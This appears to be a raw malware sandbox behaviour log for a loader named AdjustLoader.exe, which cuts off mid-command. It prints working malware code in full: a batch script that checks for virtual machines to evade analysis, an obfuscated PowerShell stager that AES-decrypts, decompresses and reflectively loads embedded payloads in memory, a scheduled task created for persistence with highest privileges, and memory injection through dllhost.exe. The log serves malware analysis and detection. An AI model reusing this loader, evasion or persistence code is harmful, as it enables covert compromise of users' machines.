Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: F90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1140000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 620000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: DE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1210000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: C60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 7C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: A50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 190000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 600000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1130000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: FD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 5D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 830000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: D20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 900000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1250000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 3A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 11F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: F40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 170000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 940000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 620000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 11F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 690000
Source: C:\Users\user\Desktop\AdjustLoader.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp6432.tmp.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"Standard PC (Q35 + ICH9, 2009)" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Users\user\AppData\Local\Temp\tmp6432.tmp.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "schtasks" /create /sc MONTHLY /tn $nya-Loli_1 /F /RL HIGHEST /tr "wscript.exe 'C:\Windows\$nya-onimai3\$nya-Loli.vbs' 'C:\Windows\$nya-onimai3\$nya-Loli.bat'" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-ScheduledTask -TaskName '$nya-Loli_1' Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"Standard PC (Q35 + ICH9, 2009)" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Windows\$nya-onimai3\$nya-Loli.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"Standard PC (Q35 + ICH9, 2009)" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Windows\$nya-onimai3\$nya-Loli.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$nya-Loli_1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$nya-Loli_1" /F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{bd6193ea-62bd-4d0d-9eeb-00767b2d70f2}
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo function oejrn($jlldq){ $sfhve=[system.security.cryptography.aes]::create(); $sfhve.mode=[system.security.cryptography.ciphermode]::cbc; $sfhve.padding=[system.security.cryptography.paddingmode]::pkcs7; $sfhve.key=[system.convert]::frombase64string('u7zgopjl7imcbldgwt+nl93+9q1owlpv32x7otllcsu='); $sfhve.iv=[system.convert]::frombase64string('ynjt8rkkmfjicvof8wpokg=='); $eafkf=$sfhve.createdecryptor(); $lkiih=$eafkf.transformfinalblock($jlldq, 0, $jlldq.length); $eafkf.dispose(); $sfhve.dispose(); $lkiih;}function penjn($jlldq){ iex '$klrvg=new-object system.io.m*em*or*ys*tr*ea*m(,$jlldq);'.replace('*', ''); iex '$llrlz=new-object system.io.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); iex '$jrwib=new-object system.io.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($klrvg, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $jrwib.copyto($llrlz); $jrwib.dispose(); $klrvg.dispose(); $llrlz.dispose(); $llrlz.toarray();}function gdwhu($jlldq,$mxfyk){ iex '$wgnfa=[system.r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$jlldq);'.replace('*', ''); iex '$rugem=$wgnfa.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); iex '$rugem.*i*n*v*o*k*e*($null, $mxfyk);'.replace('*', '');}$xpyqp = 'c:\users\user\appdata\local\temp\tmp6432.tmp.bat';$host.ui.rawui.windowtitle = $xpyqp;$wcept=[system.io.file]::readalltext($xpyqp).split([environment]::newline);foreach ($crlwk in $wcept) { if ($crlwk.startswith(':: ')) { $baedl=$crlwk.substring(3); break; }}$uspsf=[string[]]$baedl.split('\');iex '$qjsdb=penjn (oejrn ([*c*o*n*v*e*rt]::*f*r*o*m*b*a*se6*4*s*t*ri*n*g*($uspsf[0])));'.replace('*', '');iex '$kucuo=penjn (oejrn ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($uspsf[1])));'.replace('*', '');gdwhu $qjsdb $null;gdwhu $kucuo (,[string[]] ('')); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo function oejrn($jlldq){ $sfhve=[system.security.cryptography.aes]::create(); $sfhve.mode=[system.security.cryptography.ciphermode]::cbc; $sfhve.padding=[system.security.cryptography.paddingmode]::pkcs7; $sfhve.key=[system.convert]::frombase64string('u7zgopjl7imcbldgwt+nl93+9q1owlpv32x7otllcsu='); $sfhve.iv=[system.convert]::frombase64string('ynjt8rkkmfjicvof8wpokg=='); $eafkf=$sfhve.createdecryptor(); $lkiih=$eafkf.transformfinalblock($jlldq, 0, $jlldq.length); $eafkf.dispose(); $sfhve.dispose(); $lkiih;}function penjn($jlldq){ iex '$klrvg=new-object system.io.m*em*or*ys*tr*ea*m(,$jlldq);'.replace('*', ''); iex '$llrlz=new-object system.io.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); iex '$jrwib=new-object system.io.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($klrvg, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $jrwib.copyto($llrlz); $jrwib.dispose(); $klrvg.dispose(); $llrlz.dispose(); $llrlz.toarray();}function gdwhu($jlldq,$mxfyk){ iex '$wgnfa=[system.r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$jlldq);'.replace('*', ''); iex '$rugem=$wgnfa.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); iex '$rugem.*i*n*v*o*k*e*($null, $mxfyk);'.replace('*', '');}$xpyqp = 'c:\windows\$nya-onimai3\$nya-loli.bat';$host.ui.rawui.windowtitle = $xpyqp;$wcept=[system.io.file]::readalltext($xpyqp).split([environment]::newline);foreach ($crlwk in $wcept) { if ($crlwk.startswith(':: ')) { $baedl=$crlwk.substring(3); break; }}$uspsf=[string[]]$baedl.split('\');iex '$qjsdb=penjn (oejrn ([*c*o*n*v*e*rt]::*f*r*o*m*b*a*se6*4*s*t*ri*n*g*($uspsf[0])));'.replace('*', '');iex '$kucuo=penjn (oejrn ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($uspsf[1])));'.replace('*', '');gdwhu $qjsdb $null;gdwhu $kucuo (,[string[]] ('')); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo function oejrn($jlldq){ $sfhve=[system.security.cryptography.aes]::create(); $sfhve.mode=[system.security.cryptography.ciphermode]::cbc; $sfhve.padding=[system.security.cryptography.paddingmode]::pkcs7; $sfhve.key=[system.convert]::frombase64string('u7zgopjl7imcbldgwt+nl93+9q1owlpv32x7otllcsu='); $sfhve.iv=[system.convert]::frombase64string('ynjt8rkkmfjicvof8wpokg=='); $eafkf=$sfhve.createdecryptor(); $lkiih=$eafkf.transformfinalblock($jlldq, 0, $jlldq.length); $eafkf.dispose(); $sfhve.dispose(); $lkiih;}function penjn($jlldq){ iex '$klrvg=new-object system.io.m*em*or*ys*tr*ea*m(,$jlldq);'.replace('*', ''); iex '$llrlz=new-object system.io.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); iex '$jrwib=new-object system.io.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($klrvg, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $jrwib.copyto($llrlz); $jrwib.dispose(); $klrvg.dispose(); $llrlz.dispose(); $llrlz.toarray();}function gdwhu($jlldq,$mxfyk){ iex '$wgnfa=[system.r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$jlldq);'.replace('*', ''); iex '$rugem=$wgnfa.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); iex '$rugem.*i*n*v*o*k*e*($null, $mxfyk);'.replace('*', '');}$xpyqp = 'c:\windows\$nya-onimai3\$nya-loli.bat';$host.ui.rawui.windowtitle = $xpyqp;$wcept=[system.io.file]::readalltext($xpyqp).split([environment]::newline);foreach ($crlwk in $wcept) { if ($crlwk.startswith(':: ')) { $baedl=$crlwk.substring(3); break; }}$uspsf=[string[]]$baedl.split('\');iex '$qjsdb=penjn (oejrn ([*c*o*n*v*e*rt]::*f*r*o*m*b*a*se6*4*s*t*ri*n*g*($uspsf[0])));'.replace('*', '');iex '$kucuo=penjn (oejrn ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($uspsf[1])));'.replace('*', '');gdwhu $qjsdb $null;gdwhu $kucuo (,[string[]] ('')); "
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:tnonkhhduxva{param([outputtype([type])][parameter(position=0)][type[]]$wrantrmmmlzaty,[parameter(position=1)][type]$iejhpfpnzp)$fischmocbia=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+''+[char](101)+''+[char](102)+''+'l'+'e'+[char](99)+'t'+'e'+''+'d'+''+'d'+''+[char](101)+''+'l'+''+[char](101)+'g'+'a'+'te')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule('i'+[char](110)+''+'m'+''+[char](101)+''+[char](109)+''+[char](111)+''+[char](114)+'y'+[char](77)+''+[char](111)+''+[char](100)+'u'+[char](108)+''+[char](101)+'',$false).definetype(''+'m'+''+[char](121)+''+[char](68)+'e'+'l'+''+[char](101)+''+[char](103)+''+'a'+''+[char](116)+''+'e'+''+'t'+''+'y'+''+'p'+'e',''+'c'+''+[char](108)+''+[char](97)+''+'s'+''+[char](115)+','+[char](80)+''+[char](117)+''+'b'+''+'l'+''+[char](105)+''+[char](99)+''+[char](44)+'s'+[char](101)+''+[char](97)+'l'+[char](101)+'d,'+'a'+''+'n'+'s'+[char](105)+'c'+'l'+''+[char](97)+''+'s'+'s,'+[char](65)+''+[char](117)+''+'t'+''+[char](111)+'c'+'l'+''+[char](97)+''+'s'+''+'s'+'',[multicastdelegate]);$fischmocbia.defineconstructor(''+[char](82)+''+[char](84)+''+'s'+''+'p'+''+[char](101)+'c'+[char](105)+''+'a'+''+[char](108)+''+[char](78)+''+'a'+''+[char](109)+''+[char](101)+''+[char](44)+''+'h'+''+'i'+''+'d'+'e'+[char](66)+''+[char](121)+'s'+[char](105)+''+[char](103)+''+[char](44)+''+[char](80)+''+[char](117)+''+[char](98)+''+'l'+''+[char](105)+''+'c'+'',[reflection.callingconventions]::standard,$wrantrmmmlzaty).setimplementationflags(''+[char](82)+''+[char](117)+''+[char](110)+''+[char](116)+''+'i'+'m'+[char](101)+''+[char](44)+''+'m'+''+[char](97)+''+[char](110)+''+[char](97)+''+[char](103)+'e'+[char](100)+'');$fischmocbia.definemethod(''+[char](73)+''+[char](110)+''+[char](118)+''+'o'+''+[char](107)+''+[char](101)+'','p'+[char](117)+''+[char](98)+''+[char](108)+''+'i'+''+[char](99)+',h'+[char](105)+'d'+'e'+''+[char](66)+'y'+'s'+''+'i'+''+[char](103)+''+[char](44)+''+'n'+''+[char](101)+''+[char](119)+''+'s'+'l'+[char](111)+'t'+[char](44)+''+[char](86)+''+[char](105)+''+[char](114)+''+[char](116)+'u'+'a'+''+[char](108)+'',$iejhpfpnzp,$wrantrmmmlzaty).setimplementationflags(''+[char](82)+''+'u'+''+[char](110)+''+[char](116)+''+[char](105)+'m'+'e'+''+','+''+'m'+'a'+[char](110)+'a'+'g'+''+'e'+''+[char](100)+'');write-output $fischmocbia.createtype();}$beuoypwdoubyd=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+'s'+'y'+[char](115)+''+'t'+''+[char](101)+''+'m'+''+[char](46)+''+[char](100)+''+'l'+''+[char](108)+'')}).gettype('m'+[char](105)+'cro'+[char](115)+''+'o'+'f'+'t'+'.'+'w'+''+[char](105)+'n32'+[char](46)+'u'+'n'+'s'+'a'+''+[char](102)+''+'e'+''+[char](78)+'a'+[char](116)+''+[char](105)+''+[char](118)+''+'e'+''+[char](77)+'e'+'t'+''+'h'+'o'+[char](100)
